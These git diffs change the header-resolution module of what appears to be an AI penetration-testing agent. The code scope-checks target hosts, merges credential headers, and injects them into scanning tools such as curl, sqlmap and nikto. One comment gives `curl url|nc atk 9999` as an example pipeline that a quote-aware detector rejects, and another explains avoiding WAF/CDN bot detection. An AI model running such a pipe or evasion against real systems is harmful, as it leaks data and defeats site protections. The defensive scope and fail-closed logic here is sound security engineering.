+ * Target-HTTP headers resolver and the only blessed primitives for
+ * sending target HTTP from inside agent tools.
+ *
+ * INV-single-source: every category-A HTTP path obtains headers via
+ * `resolveEffectiveHeaders`. Tools call `targetFetch` (for fetch-based
+ * paths), `mergeHeadersInto` (for cases where `RequestInit` is built
+ * elsewhere), or `applyHeadersToShellCommand` (for shell tools).
+ *
+ * INV-blessed-fetch: tools under `src/core/agents/offSecAgent/tools/`
+ * must NOT call `fetch`, `Bun.fetch`, `node:http`, or `node:https`
+ * directly. The Biome rule enforces this — `targetFetch` is the only
+ * way out.
+ *
+ * INV-scope-bound: returns empty for out-of-scope URLs to prevent
+ * leakage of authentication credentials to third parties.
+ *
+ * INV-precedence-deterministic: layering is global → session →
+ * credential → request, with later layers winning on key collision.
+ */
+
+import { getDomain } from "tldts";
+import { parseTargetUrl } from "../../util/url";
+import type { EffectiveHeader, HeaderRecord, Layer } from "./types";
+
+/**
+ * Structural interface for the subset of session shape this resolver
+ * reads. Keeps `src/core/http/` decoupled from `src/core/session/` so
+ * the resolver remains a leaf module with no upward dependency.
+ */
+export interface ResolverSession {
+  readonly targets?: ReadonlyArray<string>;
+  readonly config?: {
+    readonly headers?: HeaderRecord;
+    readonly scopeConstraints?: {
+      readonly allowedHosts?: ReadonlyArray<string>;
+    };
+    readonly authCredentials?: unknown;
+  };
+  readonly credentialManager?: {
+    listCredentialsWithHeaders?: () => ReadonlyArray<{
+      readonly tokens?: { readonly customHeaders?: HeaderRecord };
+    }>;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Scope check
+// ---------------------------------------------------------------------------
+
+function getRegistrableDomain(hostname: string): string {
+  const lower = hostname.toLowerCase();
+  return getDomain(lower, { allowPrivateDomains: false }) ?? lower;
+}
+
+function getAllowedHosts(session: ResolverSession): string[] {
+  const hosts = new Set<string>();
+
+  if (session.targets) {
+    for (const t of session.targets) {
+      const parsed = parseTargetUrl(t);
+      if (parsed) hosts.add(getRegistrableDomain(parsed.hostname));
+    }
+  }
+
+  const explicit = session.config?.scopeConstraints?.allowedHosts;
+  if (explicit) {
+    for (const h of explicit) {
+      hosts.add(h.toLowerCase());
+    }
+  }
+
+  return [...hosts];
+}
+
+function isHostInScope(hostname: string, allowedHosts: string[]): boolean {
+  if (allowedHosts.length === 0) return true;
+  const lower = hostname.toLowerCase();
+  for (const allowed of allowedHosts) {
+    if (lower === allowed) return true;
+    if (lower.endsWith(`.${allowed}`)) return true;
+  }
+  return false;
+}
+
+function isUrlInSessionScope(url: string, session: ResolverSession): boolean {
+  const parsed = parseTargetUrl(url);
+  if (!parsed) return false;
+  return isHostInScope(parsed.hostname, getAllowedHosts(session));
+}
+
+// ---------------------------------------------------------------------------
+// Layer collection
+// ---------------------------------------------------------------------------
+
+function recordToEntries(
+  record: HeaderRecord | undefined,
+  source: Layer,
+): EffectiveHeader[] {
+  if (!record) return [];
+  const out: EffectiveHeader[] = [];
+  for (const [k, v] of Object.entries(record)) {
+    out.push({ name: k, value: v, source });
+  }
+  return out;
+}
+
+function collectCredentialHeaders(session: ResolverSession): EffectiveHeader[] {
+  const out: EffectiveHeader[] = [];
+  const mgr = session.credentialManager;
+  if (!mgr || typeof mgr.listCredentialsWithHeaders !== "function") {
+    return out;
+  }
+  for (const cred of mgr.listCredentialsWithHeaders()) {
+    const headers = cred.tokens?.customHeaders;
+    if (!headers) continue;
+    out.push(...recordToEntries(headers, "credential"));
+  }
+  return out;
+}
+
+/**
+ * Resolve the effective headers for an outbound request and return a
+ * plain `HeaderRecord` ready to hand to `fetch` /
+ * `setExtraHTTPHeaders` / curl.
+ *
+ * `requestOverrides` (e.g. the agent-supplied `headers` param on
+ * `http_request`) wins over every other layer per
+ * INV-precedence-explicit-request.
+ */
+export function resolveEffectiveHeaders(
+  session: ResolverSession,
+  url: string,
+  requestOverrides?: HeaderRecord,
+): HeaderRecord {
+  if (!isUrlInSessionScope(url, session)) {
+    return {};
+  }
+
+  // Session layer is the only persisted set today; global defaults are
+  // merged into a new session at create time (snapshot semantics).
+  const sessionEntries = recordToEntries(session.config?.headers, "session");
+  const credentialEntries = collectCredentialHeaders(session);
+  const requestEntries = recordToEntries(requestOverrides, "request");
+
+  // Later layers win on key collision (case-insensitive). The map keeps
+  // the FIRST entry's canonical casing for display, but the LAST entry's
+  // value.
+  const byCanonical = new Map<string, EffectiveHeader>();
+  for (const layer of [sessionEntries, credentialEntries, requestEntries]) {
+    for (const entry of layer) {
+      const key = entry.name.toLowerCase();
+      const prior = byCanonical.get(key);
+      if (prior) {
+        byCanonical.set(key, {
+          name: prior.name, // preserve first-seen casing
+          value: entry.value,
+          source: entry.source,
+        });
+      } else {
+        byCanonical.set(key, entry);
+      }
+    }
+  }
+
+  const out: HeaderRecord = {};
+  for (const entry of byCanonical.values()) {
+    out[entry.name] = entry.value;
+  }
+  return out;
+}
+
+// ---------------------------------------------------------------------------
+// Fetch + RequestInit
+// ---------------------------------------------------------------------------
+
+function normalizeHeadersInit(
+  init: HeadersInit | undefined,
+): Record<string, string> {
+  if (!init) return {};
+  if (init instanceof Headers) {
+    const out: Record<string, string> = {};
+    init.forEach((value, key) => {
+      out[key] = value;
+    });
+    return out;
+  }
+  if (Array.isArray(init)) {
+    const out: Record<string, string> = {};
+    for (const pair of init) {
+      if (pair.length === 2) out[pair[0]!] = pair[1]!;
+    }
+    return out;
+  }
+  return { ...(init as Record<string, string>) };
+}
+
+/**
+ * Merge resolved session/global/credential headers into a `RequestInit`.
+ * Any `init.headers` the caller provides is treated as the `request`
+ * layer (highest precedence) per INV-precedence-explicit-request.
+ *
+ * No-op when the URL is out of scope or no headers are configured.
+ */
+function mergeHeadersInto(
+  init: RequestInit | undefined,
+  session: ResolverSession,
+  url: string,
+): RequestInit {
+  const callerHeaders = normalizeHeadersInit(init?.headers);
+  const merged = resolveEffectiveHeaders(session, url, callerHeaders);
+
+  // Preserve everything else from init (method, body, signal, etc.).
+  return {
+    ...(init ?? {}),
+    headers: merged,
+  };
+}
+
+/**
+ * THE blessed fetch primitive for target HTTP. Every category-A path
+ * routes through this. The Biome rule forbids raw `fetch` in
+ * `src/core/agents/offSecAgent/tools/**`.
+ *
+ * Behavior is identical to `fetch(url, init)` except that resolver
+ * headers are merged in via `mergeHeadersInto`. When `url` is out of
+ * scope or no headers are configured, the call behaves exactly like
+ * a bare `fetch`.
+ */
+export function targetFetch(
+  session: ResolverSession,
+  url: string,
+  init?: RequestInit,
+): Promise<Response> {
+  const merged = mergeHeadersInto(init, session, url);
+  return fetch(url, merged);
+}
+
+// ---------------------------------------------------------------------------
+// Shell injector registry
+// ---------------------------------------------------------------------------
+
+type ShellInjector = (command: string, headers: HeaderRecord) => string;
+
+/**
+ * Quote a header value for use inside a double-quoted shell argument.
+ * Escapes `"`, `\`, `$`, and `` ` ``. The caller wraps the result in
+ * double quotes itself.
+ */
+function shellQuote(value: string): string {
+  return value
+    .replace(/\\/g, "\\\\")
+    .replace(/"/g, '\\"')
+    .replace(/\$/g, "\\$")
+    .replace(/`/g, "\\`");
+}
+
+/**
+ * Extract header names already present on the command line (so we don't
+ * duplicate a header the user/agent explicitly set). Handles `-H "K:V"`
+ * and `--header "K:V"` forms across most tools.
+ */
+function existingHeaderNames(command: string): Set<string> {
+  const out = new Set<string>();
+  const patterns = [
+    /-H[\s=](?:"([^"]+)"|'([^']+)'|(\S+))/g,
+    /--header[\s=](?:"([^"]+)"|'([^']+)'|(\S+))/g,
+    /--headers[\s=](?:"([^"]+)"|'([^']+)'|(\S+))/g,
+  ];
+  for (const re of patterns) {
+    for (const match of command.matchAll(re)) {
+      const raw = match[1] ?? match[2] ?? match[3] ?? "";
+      const colonIdx = raw.indexOf(":");
+      if (colonIdx > 0) {
+        out.add(raw.slice(0, colonIdx).trim().toLowerCase());
+      }
+    }
+  }
+  // curl `-A` / `--user-agent` overrides User-Agent
+  if (/(?:^|\s)(?:-A|--user-agent)[\s=]/.test(command)) {
+    out.add("user-agent");
+  }
+  return out;
+}
+
+function buildHFlags(
+  headers: HeaderRecord,
+  existing: Set<string>,
+  flagName: "-H" | "--header",
+): string {
+  const parts: string[] = [];
+  for (const [name, value] of Object.entries(headers)) {
+    if (existing.has(name.toLowerCase())) continue;
+    parts.push(`${flagName} "${shellQuote(`${name}: ${value}`)}"`);
+  }
+  return parts.join(" ");
+}
+
+const injectCurl: ShellInjector = (command, headers) => {
+  const existing = existingHeaderNames(command);
+  const flags = buildHFlags(headers, existing, "-H");
+  if (!flags) return command;
+  // Insert flags after `curl` (handles `curl`, `curl ...args`).
+  return command.replace(/(\bcurl\b)/, `$1 ${flags}`);
+};
+
+const injectWget: ShellInjector = (command, headers) => {
+  const existing = existingHeaderNames(command);
+  const parts: string[] = [];
+  for (const [name, value] of Object.entries(headers)) {
+    if (existing.has(name.toLowerCase())) continue;
+    parts.push(`--header="${shellQuote(`${name}: ${value}`)}"`);
+  }
+  if (parts.length === 0) return command;
+  return command.replace(/(\bwget\b)/, `$1 ${parts.join(" ")}`);
+};
+
+const injectGenericH: (tool: string) => ShellInjector =
+  (tool) => (command, headers) => {
+    const existing = existingHeaderNames(command);
+    const flags = buildHFlags(headers, existing, "-H");
+    if (!flags) return command;
+    const re = new RegExp(`(\\b${tool}\\b)`);
+    return command.replace(re, `$1 ${flags}`);
+  };
+
+const injectSqlmap: ShellInjector = (command, headers) => {
+  const existing = existingHeaderNames(command);
+  const lines: string[] = [];
+  for (const [name, value] of Object.entries(headers)) {
+    if (existing.has(name.toLowerCase())) continue;
+    lines.push(`${name}: ${value}`);
+  }
+  if (lines.length === 0) return command;
+  const headerArg = `--headers="${shellQuote(lines.join("\\n"))}"`;
+  return command.replace(/(\bsqlmap\b)/, `$1 ${headerArg}`);
+};
+
+const injectNikto: ShellInjector = (command, headers) => {
+  const existing = existingHeaderNames(command);
+  const lines: string[] = [];
+  for (const [name, value] of Object.entries(headers)) {
+    if (existing.has(name.toLowerCase())) continue;
+    lines.push(`${name}: ${value}`);
+  }
+  if (lines.length === 0) return command;
+  const arg = `-headers "${shellQuote(lines.join("\n"))}"`;
+  return command.replace(/(\bnikto\b)/, `$1 ${arg}`);
+};
+
+/**
+ * Registry of recognized HTTP CLI tools and how to inject headers into
+ * each. Data, not code: adding a new tool is one entry, not a new
+ * branch in a switch.
+ */
+const shellInjectorRegistry: ReadonlyMap<string, ShellInjector> = new Map<
+  string,
+  ShellInjector
+>([
+  ["curl", injectCurl],
+  ["wget", injectWget],
+  ["nuclei", injectGenericH("nuclei")],
+  ["ffuf", injectGenericH("ffuf")],
+  ["gobuster", injectGenericH("gobuster")],
+  ["httpx", injectGenericH("httpx")],
+  ["feroxbuster", injectGenericH("feroxbuster")],
+  ["dirb", injectGenericH("dirb")],
+  ["wfuzz", injectGenericH("wfuzz")],
+  ["wpscan", injectGenericH("wpscan")],
+  ["sqlmap", injectSqlmap],
+  ["nikto", injectNikto],
+]);
+
+// ---------------------------------------------------------------------------
+// Shell command header injection
+// ---------------------------------------------------------------------------
+
+const COMMAND_SPLIT = /(?:^|\s)(?:[;&|]{1,2})/;
+const COMMAND_PREFIX_STRIP =
+  /^\s*(?:sudo\s+(?:-[^\s]*\s+)*|timeout\s+\S+\s+|env\s+(?:\S+=\S+\s+)+|nohup\s+)+/;
+
+/**
+ * Identify the first HTTP tool name on a command line, stripping common
+ * wrappers (`sudo`, `timeout N`, `env K=V`, `nohup`). Returns `null` if
+ * the leading word is not in `shellInjectorRegistry` or if the command
+ * is pipelined / chained (the safe answer in that case is "don't
+ * inject" so the caller can fail closed).
+ */
+function detectHttpToolOnCommand(command: string): string | null {
+  // Reject pipelined / chained commands — we cannot safely inject into
+  // a pipeline. Caller fails closed.
+  if (COMMAND_SPLIT.test(` ${command}`)) return null;
+
+  const stripped = command.replace(COMMAND_PREFIX_STRIP, "");
+  const firstWord = stripped.trim().split(/\s+/)[0];
+  if (!firstWord) return null;
+
+  if (shellInjectorRegistry.has(firstWord)) return firstWord;
+  return null;
+}
+
+export type ApplyShellStatus = "injected" | "no-headers" | "unknown-tool";
+
+export type ApplyShellResult = {
+  readonly command: string;
+  readonly status: ApplyShellStatus;
+  readonly tool: string | null;
+};
+
+/**
+ * Inject session/global/credential headers into a shell command line.
+ *
+ * Behavior matrix:
+ *  - no in-scope hosts on the command → `no-headers` (return as-is)
+ *  - in-scope but no headers configured → `no-headers` (return as-is)
+ *  - in-scope + headers + known tool → `injected` (return augmented)
+ *  - in-scope + headers + unknown tool / pipelined → `unknown-tool`
+ *    (caller MUST fail closed; INV-shell-injection)
+ *
+ * `commandHosts` is the list of hosts on the command line (extracted by
+ * the caller via scopeGuard). This module deliberately does not parse
+ * the command for hosts — that logic already lives in scopeGuard and
+ * duplicating it would diverge.
+ */
+export function applyHeadersToShellCommand(
+  command: string,
+  session: ResolverSession,
+  commandHosts: ReadonlyArray<string>,
+): ApplyShellResult {
+  // Find the highest-scope URL-like target on the command line and use
+  // it to drive the resolver. If no host is present, there's nothing
+  // to inject for.
+  const inScopeHost = commandHosts.find((h) => {
+    const allowed = getAllowedHosts(session);
+    return isHostInScope(h, allowed);
+  });
+  if (!inScopeHost) {
+    return { command, status: "no-headers", tool: null };
+  }
+
+  // Build a synthetic URL so the resolver's scope check sees the host.
+  const url = `https://${inScopeHost}`;
+  const headers = resolveEffectiveHeaders(session, url);
+  if (Object.keys(headers).length === 0) {
+    return { command, status: "no-headers", tool: null };
+  }
+
+  const tool = detectHttpToolOnCommand(command);
+  if (!tool) {
+    return { command, status: "unknown-tool", tool: null };
+  }
+
+  const injector = shellInjectorRegistry.get(tool)!;
+  return {
+    command: injector(command, headers),
+    status: "injected",
+    tool,
+  };
+}

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -300,8 +300,7 @@ const injectCurl: ShellInjector = (command, headers) => {
   const existing = existingHeaderNames(command);
   const flags = buildHFlags(headers, existing, "-H");
   if (!flags) return command;
-  // Insert flags after `curl` (handles `curl`, `curl ...args`).
-  return command.replace(/(\bcurl\b)/, `$1 ${flags}`);
+  return command.replace(/(\bcurl\b)/, (m) => `${m} ${flags}`);
 };
 
 const injectWget: ShellInjector = (command, headers) => {
@@ -312,7 +311,8 @@ const injectWget: ShellInjector = (command, headers) => {
     parts.push(`--header="${shellQuote(`${name}: ${value}`)}"`);
   }
   if (parts.length === 0) return command;
-  return command.replace(/(\bwget\b)/, `$1 ${parts.join(" ")}`);
+  const joined = parts.join(" ");
+  return command.replace(/(\bwget\b)/, (m) => `${m} ${joined}`);
 };
 
 const injectGenericH: (tool: string) => ShellInjector =
@@ -321,7 +321,7 @@ const injectGenericH: (tool: string) => ShellInjector =
     const flags = buildHFlags(headers, existing, "-H");
     if (!flags) return command;
     const re = new RegExp(`(\\b${tool}\\b)`);
-    return command.replace(re, `$1 ${flags}`);
+    return command.replace(re, (m) => `${m} ${flags}`);
   };
 
 const injectSqlmap: ShellInjector = (command, headers) => {
@@ -333,7 +333,7 @@ const injectSqlmap: ShellInjector = (command, headers) => {
   }
   if (lines.length === 0) return command;
   const headerArg = `--headers="${shellQuote(lines.join("\\n"))}"`;
-  return command.replace(/(\bsqlmap\b)/, `$1 ${headerArg}`);
+  return command.replace(/(\bsqlmap\b)/, (m) => `${m} ${headerArg}`);
 };
 
 const injectNikto: ShellInjector = (command, headers) => {
@@ -349,7 +349,7 @@ const injectNikto: ShellInjector = (command, headers) => {
   // in the shell command would split it across lines in persistent /
   // line-based shells. Mirrors the sqlmap injector above.
   const arg = `-headers "${shellQuote(lines.join("\\n"))}"`;
-  return command.replace(/(\bnikto\b)/, `$1 ${arg}`);
+  return command.replace(/(\bnikto\b)/, (m) => `${m} ${arg}`);
 };
 
 /**

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -499,10 +499,8 @@ export function applyHeadersToShellCommand(
   // Find the highest-scope URL-like target on the command line and use
   // it to drive the resolver. If no host is present, there's nothing
   // to inject for.
-  const inScopeHost = commandHosts.find((h) => {
-    const allowed = getAllowedHosts(session);
-    return isHostInScope(h, allowed);
-  });
+  const allowed = getAllowedHosts(session);
+  const inScopeHost = commandHosts.find((h) => isHostInScope(h, allowed));
   if (!inScopeHost) {
     return { command, status: "no-headers", tool: null };
   }

--- a/src/core/http/targetHeaders.ts
+++ b/src/core/http/targetHeaders.ts
@@ -1,33 +1,16 @@
-/**
- * Target-HTTP headers resolver and the only blessed primitives for
- * sending target HTTP from inside agent tools.
- *
- * INV-single-source: every category-A HTTP path obtains headers via
- * `resolveEffectiveHeaders`. Tools call `targetFetch` (for fetch-based
- * paths), `mergeHeadersInto` (for cases where `RequestInit` is built
- * elsewhere), or `applyHeadersToShellCommand` (for shell tools).
- *
- * INV-blessed-fetch: tools under `src/core/agents/offSecAgent/tools/`
- * must NOT call `fetch`, `Bun.fetch`, `node:http`, or `node:https`
- * directly. The Biome rule enforces this — `targetFetch` is the only
- * way out.
- *
- * INV-scope-bound: returns empty for out-of-scope URLs to prevent
- * leakage of authentication credentials to third parties.
- *
- * INV-precedence-deterministic: layering is global → session →
- * credential → request, with later layers winning on key collision.
- */
+// Target-HTTP header resolver and the blessed primitives for outbound
+// target HTTP from agent tools (`targetFetch`, `applyHeadersToShellCommand`).
+// Returns empty for out-of-scope URLs to prevent credential leakage.
+// Precedence: session < credential < request (later wins).
+// The Biome `noRestrictedGlobals` rule forbids raw `fetch` under
+// `src/core/agents/offSecAgent/tools/**` so callers must route here.
 
 import { getDomain } from "tldts";
 import { parseTargetUrl } from "../../util/url";
 import type { EffectiveHeader, HeaderRecord, Layer } from "./types";
 
-/**
- * Structural interface for the subset of session shape this resolver
- * reads. Keeps `src/core/http/` decoupled from `src/core/session/` so
- * the resolver remains a leaf module with no upward dependency.
- */
+// Structural subset of session shape the resolver reads. Kept loose so
+// `src/core/http/` stays a leaf module with no upward dependency on session.
 export interface ResolverSession {
   readonly targets?: ReadonlyArray<string>;
   readonly config?: {
@@ -119,15 +102,8 @@ function collectCredentialHeaders(session: ResolverSession): EffectiveHeader[] {
   return out;
 }
 
-/**
- * Resolve the effective headers for an outbound request and return a
- * plain `HeaderRecord` ready to hand to `fetch` /
- * `setExtraHTTPHeaders` / curl.
- *
- * `requestOverrides` (e.g. the agent-supplied `headers` param on
- * `http_request`) wins over every other layer per
- * INV-precedence-explicit-request.
- */
+// `requestOverrides` (e.g. the agent-supplied `headers` arg on `http_request`)
+// wins over every other layer. Out-of-scope URLs only see the overrides.
 export function resolveEffectiveHeaders(
   session: ResolverSession,
   url: string,
@@ -137,15 +113,11 @@ export function resolveEffectiveHeaders(
     return requestOverrides ?? {};
   }
 
-  // Session layer is the only persisted set today; global defaults are
-  // merged into a new session at create time (snapshot semantics).
   const sessionEntries = recordToEntries(session.config?.headers, "session");
   const credentialEntries = collectCredentialHeaders(session);
   const requestEntries = recordToEntries(requestOverrides, "request");
 
-  // Later layers win on key collision (case-insensitive). The map keeps
-  // the FIRST entry's canonical casing for display, but the LAST entry's
-  // value.
+  // Later layers win on case-insensitive collision; preserve first-seen casing.
   const byCanonical = new Map<string, EffectiveHeader>();
   for (const layer of [sessionEntries, credentialEntries, requestEntries]) {
     for (const entry of layer) {
@@ -153,7 +125,7 @@ export function resolveEffectiveHeaders(
       const prior = byCanonical.get(key);
       if (prior) {
         byCanonical.set(key, {
-          name: prior.name, // preserve first-seen casing
+          name: prior.name,
           value: entry.value,
           source: entry.source,
         });
@@ -174,21 +146,11 @@ export function resolveEffectiveHeaders(
 // Browser-safe header filtering
 // ---------------------------------------------------------------------------
 
-/**
- * Headers managed by the browser engine that must NOT be passed via
- * Playwright's `extraHTTPHeaders` (which unconditionally overrides the
- * browser's own values). Notably, `User-Agent` is set via Chromium's
- * `--user-agent` flag with a realistic desktop string — leaking the
- * session's `User-Agent: pensar-apex` default here would defeat WAF/CDN
- * bypass and bot detection avoidance.
- */
+// Playwright's `extraHTTPHeaders` unconditionally overrides browser-managed
+// values. Stripping User-Agent keeps Chromium's realistic UA so WAF/CDN bot
+// detection isn't tripped by the session's `pensar-apex` default.
 const BROWSER_MANAGED_HEADERS: ReadonlySet<string> = new Set(["user-agent"]);
 
-/**
- * Strip headers that the browser manages internally before passing to
- * Playwright's `extraHTTPHeaders`. Use this at every boundary where
- * resolved session headers flow into a browser context.
- */
 export function stripBrowserManagedHeaders(
   headers: HeaderRecord | undefined,
 ): HeaderRecord | undefined {
@@ -227,13 +189,6 @@ function normalizeHeadersInit(
   return { ...(init as Record<string, string>) };
 }
 
-/**
- * Merge resolved session/global/credential headers into a `RequestInit`.
- * Any `init.headers` the caller provides is treated as the `request`
- * layer (highest precedence) per INV-precedence-explicit-request.
- *
- * No-op when the URL is out of scope or no headers are configured.
- */
 function mergeHeadersInto(
   init: RequestInit | undefined,
   session: ResolverSession,
@@ -241,24 +196,14 @@ function mergeHeadersInto(
 ): RequestInit {
   const callerHeaders = normalizeHeadersInit(init?.headers);
   const merged = resolveEffectiveHeaders(session, url, callerHeaders);
-
-  // Preserve everything else from init (method, body, signal, etc.).
   return {
     ...(init ?? {}),
     headers: merged,
   };
 }
 
-/**
- * THE blessed fetch primitive for target HTTP. Every category-A path
- * routes through this. The Biome rule forbids raw `fetch` in
- * `src/core/agents/offSecAgent/tools/**`.
- *
- * Behavior is identical to `fetch(url, init)` except that resolver
- * headers are merged in via `mergeHeadersInto`. When `url` is out of
- * scope or no headers are configured, the call behaves exactly like
- * a bare `fetch`.
- */
+// Blessed fetch for target HTTP — behaves like `fetch(url, init)` plus
+// resolver-merged headers. Out-of-scope URLs pass through unchanged.
 export function targetFetch(
   session: ResolverSession,
   url: string,
@@ -274,11 +219,8 @@ export function targetFetch(
 
 type ShellInjector = (command: string, headers: HeaderRecord) => string;
 
-/**
- * Quote a header value for use inside a double-quoted shell argument.
- * Escapes `"`, `\`, `$`, and `` ` ``. The caller wraps the result in
- * double quotes itself.
- */
+// Escape a value for use inside a double-quoted shell argument. The
+// caller is responsible for wrapping the result in `"…"`.
 export function shellQuote(value: string): string {
   return value
     .replace(/\\/g, "\\\\")
@@ -289,11 +231,8 @@ export function shellQuote(value: string): string {
     .replace(/\r/g, "\\r");
 }
 
-/**
- * Extract header names already present on the command line (so we don't
- * duplicate a header the user/agent explicitly set). Handles `-H "K:V"`
- * and `--header "K:V"` forms across most tools.
- */
+// Header names already on the command — skip these to avoid clobbering
+// user/agent-supplied values.
 function existingHeaderNames(command: string): Set<string> {
   const out = new Set<string>();
   const patterns = [
@@ -310,7 +249,6 @@ function existingHeaderNames(command: string): Set<string> {
       }
     }
   }
-  // curl `-A` / `--user-agent` overrides User-Agent
   if (/(?:^|\s)(?:-A|--user-agent)[\s=]/.test(command)) {
     out.add("user-agent");
   }
@@ -378,19 +316,12 @@ const injectNikto: ShellInjector = (command, headers) => {
     lines.push(`${name}: ${value}`);
   }
   if (lines.length === 0) return command;
-  // Use the literal two-character escape `\n`, not a 0x0A byte. Nikto
-  // interprets `\n` as the header separator, and embedding a raw newline
-  // in the shell command would split it across lines in persistent /
-  // line-based shells. Mirrors the sqlmap injector above.
+  // Literal `\n`, not 0x0A — nikto wants the two-char escape and a real
+  // newline would break line-based persistent shells.
   const arg = `-headers "${shellQuote(lines.join("\\n"))}"`;
   return command.replace(/(?<!\/)(\bnikto\b)/, (m) => `${m} ${arg}`);
 };
 
-/**
- * Registry of recognized HTTP CLI tools and how to inject headers into
- * each. Data, not code: adding a new tool is one entry, not a new
- * branch in a switch.
- */
 const shellInjectorRegistry: ReadonlyMap<string, ShellInjector> = new Map<
   string,
   ShellInjector
@@ -416,25 +347,17 @@ const shellInjectorRegistry: ReadonlyMap<string, ShellInjector> = new Map<
 const COMMAND_PREFIX_STRIP =
   /^\s*(?:sudo\s+(?:-[^\s]*\s+)*|timeout\s+\S+\s+|env\s+(?:\S+=\S+\s+)+|nohup\s+)+/;
 
-/**
- * True iff the command contains a shell control operator (`;`, `&`, `|`,
- * or any doubled form) outside single/double quotes. A regex on its own
- * cannot do this safely — either it requires whitespace before the
- * operator (and misses `curl url|nc atk 9999`) or it matches operators
- * inside quoted argument values (`curl -H "X: a|b" url`). So we walk
- * the string and respect quote state.
- *
- * Backslash escapes a single following character outside single quotes
- * (POSIX rule). Inside single quotes nothing is escaped — the only way
- * out is a closing `'`.
- */
+// Detect `;`, `&`, `|` outside quotes — a regex alone either matches
+// operators inside quoted args or misses no-whitespace pipelines like
+// `curl url|nc atk 9999`, so we walk the string with POSIX quote/escape
+// rules instead.
 function hasShellOperatorOutsideQuotes(command: string): boolean {
   let inSingle = false;
   let inDouble = false;
   for (let i = 0; i < command.length; i++) {
     const ch = command[i];
     if (!inSingle && ch === "\\" && i + 1 < command.length) {
-      i++; // skip the escaped character
+      i++;
       continue;
     }
     if (!inDouble && ch === "'") {
@@ -452,11 +375,7 @@ function hasShellOperatorOutsideQuotes(command: string): boolean {
   return false;
 }
 
-/**
- * Extract the leading tool name from a command line, stripping common
- * wrappers (`sudo`, `timeout N`, `env K=V`, `nohup`). Returns `null`
- * for pipelined / chained commands or empty input.
- */
+// Returns null for pipelined / chained commands so callers can fail closed.
 function extractLeadingTool(command: string): string | null {
   if (hasShellOperatorOutsideQuotes(command)) return null;
   const stripped = command.replace(COMMAND_PREFIX_STRIP, "");
@@ -464,11 +383,8 @@ function extractLeadingTool(command: string): string | null {
   return firstWord || null;
 }
 
-/**
- * Networking tools that operate below the HTTP layer and never send
- * HTTP headers. These must not be blocked by the fail-closed header
- * injection logic — headers are simply irrelevant for them.
- */
+// Tools that operate below the HTTP layer — headers don't apply, so
+// they must not be blocked by the fail-closed branch in `applyHeadersToShellCommand`.
 const NON_HTTP_TOOLS: ReadonlySet<string> = new Set([
   "nmap",
   "masscan",
@@ -490,12 +406,6 @@ const NON_HTTP_TOOLS: ReadonlySet<string> = new Set([
   "amass",
 ]);
 
-/**
- * Identify the first HTTP tool name on a command line. Returns `null` if
- * the leading word is not in `shellInjectorRegistry` or if the command
- * is pipelined / chained (the safe answer in that case is "don't
- * inject" so the caller can fail closed).
- */
 function detectHttpToolOnCommand(command: string): string | null {
   const tool = extractLeadingTool(command);
   if (tool && shellInjectorRegistry.has(tool)) return tool;
@@ -510,36 +420,25 @@ export type ApplyShellResult = {
   readonly tool: string | null;
 };
 
-/**
- * Inject session/global/credential headers into a shell command line.
- *
- * Behavior matrix:
- *  - no in-scope hosts on the command → `no-headers` (return as-is)
- *  - in-scope but no headers configured → `no-headers` (return as-is)
- *  - in-scope + headers + known tool → `injected` (return augmented)
- *  - in-scope + headers + unknown tool / pipelined → `unknown-tool`
- *    (caller MUST fail closed; INV-shell-injection)
- *
- * `commandHosts` is the list of hosts on the command line (extracted by
- * the caller via scopeGuard). This module deliberately does not parse
- * the command for hosts — that logic already lives in scopeGuard and
- * duplicating it would diverge.
- */
+// Inject session/credential headers into a shell command line.
+// `commandHosts` comes from scopeGuard so the two callers share one scope view.
+//
+// Result statuses:
+//   - `no-headers`   nothing to inject (return command unchanged)
+//   - `injected`     command was rewritten with -H flags
+//   - `unknown-tool` headers exist but the tool/pipeline is unrecognized;
+//                    the caller MUST fail closed
 export function applyHeadersToShellCommand(
   command: string,
   session: ResolverSession,
   commandHosts: ReadonlyArray<string>,
 ): ApplyShellResult {
-  // Find the highest-scope URL-like target on the command line and use
-  // it to drive the resolver. If no host is present, there's nothing
-  // to inject for.
   const allowed = getAllowedHosts(session);
   const inScopeHost = commandHosts.find((h) => isHostInScope(h, allowed));
   if (!inScopeHost) {
     return { command, status: "no-headers", tool: null };
   }
 
-  // Build a synthetic URL so the resolver's scope check sees the host.
   const url = `https://${inScopeHost}`;
   const headers = resolveEffectiveHeaders(session, url);
   if (Object.keys(headers).length === 0) {

--- a/src/core/http/types.ts
+++ b/src/core/http/types.ts
@@ -1,0 +1,62 @@
+/**
+ * Shared types for the custom-headers subsystem.
+ *
+ * Headers flow through the codebase as plain `Record<string, string>`.
+ * The Biome `noRestrictedGlobals` rule (see biome.jsonc) enforces that
+ * agent tools route outbound HTTP through `targetFetch` —
+ * INV-blessed-fetch — which is the single mechanism preventing raw
+ * `fetch` from bypassing the resolver.
+ */
+
+export type HeaderRecord = Record<string, string>;
+
+/**
+ * Source layer of an effective header. Order matches precedence: later
+ * layers win on key collision in the resolver.
+ *
+ * See INV-precedence-deterministic and INV-precedence-explicit-request.
+ */
+export type Layer = "global" | "session" | "credential" | "request";
+
+export type EffectiveHeader = {
+  readonly name: string;
+  readonly value: string;
+  readonly source: Layer;
+};
+
+/**
+ * Lower-cased substring patterns that mark a header as sensitive.
+ * Sensitive headers are masked in display.
+ */
+const SENSITIVE_PATTERNS = [
+  "authorization",
+  "cookie",
+  "token",
+  "key",
+  "secret",
+  "password",
+] as const;
+
+export function isSensitiveHeaderName(name: string): boolean {
+  const lower = name.toLowerCase();
+  return SENSITIVE_PATTERNS.some((p) => lower.includes(p));
+}
+
+/**
+ * Render a header value safely for display. Sensitive values are masked
+ * to the last four characters (`****abc1`). Pass `showSecrets` to
+ * unmask for explicit user requests (`/headers list --show`).
+ */
+export function renderHeaderValue(
+  name: string,
+  value: string,
+  showSecrets: boolean,
+): string {
+  if (showSecrets || !isSensitiveHeaderName(name)) {
+    return value;
+  }
+  if (value.length <= 4) {
+    return "****";
+  }
+  return `****${value.slice(-4)}`;
+}

--- a/src/core/http/types.ts
+++ b/src/core/http/types.ts
@@ -1,21 +1,6 @@
-/**
- * Shared types for the custom-headers subsystem.
- *
- * Headers flow through the codebase as plain `Record<string, string>`.
- * The Biome `noRestrictedGlobals` rule (see biome.jsonc) enforces that
- * agent tools route outbound HTTP through `targetFetch` —
- * INV-blessed-fetch — which is the single mechanism preventing raw
